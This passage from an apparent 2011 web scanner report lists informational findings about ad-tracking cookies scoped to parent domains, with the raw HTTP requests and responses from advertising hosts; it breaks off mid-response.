Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

// Plugin to contain scripts frequently used across multiple widgets
// Minipersona, report abuse, that sort of thing.

pluckAppProxy.registerPlugin("pluck/pluck.js",
// init function, called fir
...[SNIP]...

13.72. http://sync.adap.tv/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?type=gif&key=turn&uid=2925993182975414771 HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:31 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

13.73. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1315099467; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 01:24:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img HTTP/1.1
Host: sync.mathtag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6804 26628
Set-Cookie: ts=1315099467; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 01:24:27 GMT
Date: Sun, 04 Sep 2011 01:24:27 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

13.74. http://tacoda.at.atwola.com/rtx/r.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:13 GMT; domain=.at.atwola.com
ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=.at.atwola.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:13 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:13 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:13 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:13 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100173|17778^1315097086^1315100173; path=/; expires=Sun, 04-Sep-11 01:36:13 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();

13.75. http://tags.bluekai.com/site/2964 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2964

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4e62ce11; expires=Tue, 06-Sep-2011 01:02:09 GMT; path=/; domain=.bluekai.com
bk=VaDKuLV5c/cze1lp; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
bkc=KJ0qyLl9y1qO0YOTnLZwARsORx3xgtF/Q1vwRDcymqARswj1jt9yw/lQcths8qLNGwJOB/0FOLHt+HYIBJx4hGUve6UMQI0cXxsoJO+c; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4GJ7Qr0xX99Nx1IQ==; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2964?id=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/rubicon-cms2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9c2; bk=LSg6zMqbInUze1lp; bkc=KJhERtOQLv+kRBCp1LZwYzCV9I/ynkHIvOGdCQUOwXE/ynOKiGsC9LC7CwnUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9YSHuGL=; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:09 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62ce11; expires=Tue, 06-Sep-2011 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=VaDKuLV5c/cze1lp; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJ0qyLl9y1qO0YOTnLZwARsORx3xgtF/Q1vwRDcymqARswj1jt9yw/lQcths8qLNGwJOB/0FOLHt+HYIBJx4hGUve6UMQI0cXxsoJO+c; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4GJ7Qr0xX99Nx1IQ==; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 01:02:09 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

13.76. http://tags.bluekai.com/site/38 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/38

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4e62c9c2; expires=Tue, 06-Sep-2011 00:43:46 GMT; path=/; domain=.bluekai.com
bk=LSg6zMqbInUze1lp; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com
bkc=KJhERtOQLv+kRBCp1LZwYzCV9I/ynkHIvOGdCQUOwXE/ynOKiGsC9LC7CwnUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9YSHuGL=; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/38 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9bc; bk=JhN45MqbInUze1lp; bkc=KJhERtOQLv+kRBCp1LZwWzCV9I/ynkHIvOGdCQUOwyxANALh1axQX5KCXDc3RUyoxxSsFUh1eeq7ThOXUkuICOyeYCIAcXqdhLw9zamsiuaGeRJdyJWHCqXjM52FQLGdgRnv5IhAxmsef/whmDaI7Xf9AauvTO2LHrVfBSe0xEu1Fhg/lfyjkVd5iLGctjz/8x19/mavCy==; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:46 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62c9c2; expires=Tue, 06-Sep-2011 00:43:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=LSg6zMqbInUze1lp; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhERtOQLv+kRBCp1LZwYzCV9I/ynkHIvOGdCQUOwXE/ynOKiGsC9LC7CwnUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9YSHuGL=; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 00:43:46 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 00:43:46 GMT
Cache-Control: max-age=86400, private
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

13.77. http://tags.bluekai.com/site/4449 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4449

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
bk=myAUzYJX+9Fze1lp; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4449 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9df; bk=aBD3cMqbInUze1lp; bkc=KJ0qyLl9y1qO0cedjJ/4/y1eyhxQU2Kx9RD4yTnQ3yshUu6eyhTQ7y7veIBY8RKiXDcbR4hexWwVupWyPWeB9dcUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9WY6PW9=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bkdc=sf

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=myAUzYJX+9Fze1lp; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Location: http://segments.adap.tv/data/?p=datalogix&type=gif&segment=1,32838,33729&add=true&rnd=11785756489
BK-Server: bbc9
Content-Length: 0
Content-Type: text/html

13.78. http://tags.bluekai.com/site/450 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/450

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4e62c978; expires=Tue, 06-Sep-2011 00:42:32 GMT; path=/; domain=.bluekai.com
bk=tdEhIeqbInUze1lp; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com
bkc=KJyfh1M9LabvQScijJ/4A1kyYWiLxIwcLYeTDG/1ecF8ZOCLpLzCIn0G49A8OCxIueI1dTtcQKsZeOBe6OGWdT9M/yod1h3dlyuP4NGakKdR0ReYO2AcTlB01EeLZzf9AauvTO2LHrVfBSe0xEu1Fhg/lfyjkVd5iLGctjz/8x19tyLdwx==; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/450 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bk=Y0OrmpqbInUze1lp; bkc=KJ0EWZHQt1FchsOpwLbwARsOxxgW86UkuXQhGwOMVOeXqpy1ee5kZOiYNieTOhyjD4iq64M2J3MX603G415mOCxI0eTR78mnQVcw59Ssoa/Wdt9pv+I+9jDwGZcXNDeI8LtG4m+VPef/FAxGcyO2+pD+

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62c978; expires=Tue, 06-Sep-2011 00:42:32 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=tdEhIeqbInUze1lp; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJyfh1M9LabvQScijJ/4A1kyYWiLxIwcLYeTDG/1ecF8ZOCLpLzCIn0G49A8OCxIueI1dTtcQKsZeOBe6OGWdT9M/yod1h3dlyuP4NGakKdR0ReYO2AcTlB01EeLZzf9AauvTO2LHrVfBSe0xEu1Fhg/lfyjkVd5iLGctjz/8x19tyLdwx==; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 00:42:32 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 00:42:32 GMT
Cache-Control: max-age=86400, private
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

13.79. http://tags.bluekai.com/site/4592 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4592

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/4592 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9df; bk=aBD3cMqbInUze1lp; bkc=KJ0qyLl9y1qO0cedjJ/4/y1eyhxQU2Kx9RD4yTnQ3yshUu6eyhTQ7y7veIBY8RKiXDcbR4hexWwVupWyPWeB9dcUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9WY6PW9=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Cache-Control: max-age=86400, private
BK-Server: f778
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

13.80. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cd=false; Domain=.rubiconproject.com; Expires=Mon, 03-Sep-2012 01:24:33 GMT; Path=/
lm="4 Sep 2011 01:24:33 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 01:24:33 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.rubiconproject.com/tap.php?v=5852&nid=2101&put=
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Mon, 03-Sep-2012 01:24:33 GMT; Path=/
Set-Cookie: dq=2|2|0|0; Expires=Mon, 03-Sep-2012 01:24:33 GMT; Path=/
Set-Cookie: lm="4 Sep 2011 01:24:33 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8

13.81. http://tu.connect.wunderloop.net/TU/1/1/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tu.connect.wunderloop.net
Path:	/TU/1/1/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:54:50 GMT; domain=.wunderloop.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:50 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:54:50 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.82. http://tu.connect.wunderloop.net/TU2/1/1/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tu.connect.wunderloop.net
Path:	/TU2/1/1/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:43:57 GMT; domain=.wunderloop.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU2/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:57 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
